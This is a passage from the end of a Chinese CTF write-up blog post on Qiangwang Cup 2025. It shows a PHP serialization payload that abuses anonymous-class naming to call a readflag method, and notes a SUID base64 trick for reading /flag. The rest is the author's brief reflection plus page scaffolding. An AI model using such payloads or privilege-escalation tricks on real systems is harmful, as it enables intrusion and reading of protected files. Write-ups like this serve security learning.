<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$o1</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o1</span>-&gt;f = <span class="hljs-string">&#x27;test&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;key = <span class="hljs-string">&#x27;class&#x27;</span>;<br><span class="hljs-variable">$o1</span>-&gt;readflag = <span class="hljs-string">&#x27;18112&#x27;</span>;<br><br><span class="hljs-variable">$o2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o2</span>-&gt;f = [<span class="hljs-string">&quot;class@anonymous\0/var/www/html/index.php(1) : eval()&#x27;d code:1<span class="hljs-subst">$0</span>&quot;</span>, <span class="hljs-string">&#x27;readflag&#x27;</span>];<br><span class="hljs-variable">$o2</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o2</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-variable">$o3</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test</span>();<br><span class="hljs-variable">$o3</span>-&gt;f = <span class="hljs-string">&#x27;readflag&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt;key = <span class="hljs-string">&#x27;func&#x27;</span>;<br><span class="hljs-variable">$o3</span>-&gt;readflag = <span class="hljs-string">&#x27;0&#x27;</span>;<br><br><span class="hljs-keyword">echo</span>(<span class="hljs-title function_ invoke__">serialize</span>([<span class="hljs-variable">$obj1</span>, <span class="hljs-variable">$obj2</span>, <span class="hljs-variable">$obj3</span>]));<br></code></pre></td></tr></table></figure>

<p>对于最后一步的提权就是一个非常简单的suid提权，base64有s权限，直接执行base64 &#x2F;flag就行了</p>
<h1 id="总结与反思"><a href="/2025/10/21/强网杯2025wp/#总结与反思" class="headerlink" title="总结与反思"></a>总结与反思</h1><p>php十分灵活，有各种各样的用法，做这种题比较考验耐心。这次比赛也让我对要审源码的题有了一点点体会</p>
<p><del>虽然没出</del></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/wp/" class="print-no-link">#wp</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>强网杯2025wp</div>
      <div>http://example.com/2025/10/21/强网杯2025wp/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>onehang</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月21日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/27/m0leconctf-%E5%91%BD%E4%BB%A4%E5%8F%82%E6%95%B0%E6%B3%A8%E5%85%A5/" title="m0leconctf--命令参数注入">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">m0leconctf--命令参数注入</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/14/%E5%85%B3%E4%BA%8Epython%E4%B8%AD%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0%E7%9A%84%E8%BF%94%E5%9B%9E%E5%80%BC%E7%9A%84%E7%A0%94%E7%A9%B6/" title="关于python中命令执行函数的返回值的研究">
                        <span class="hidden-mobile">关于python中命令执行函数的返回值的研究</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
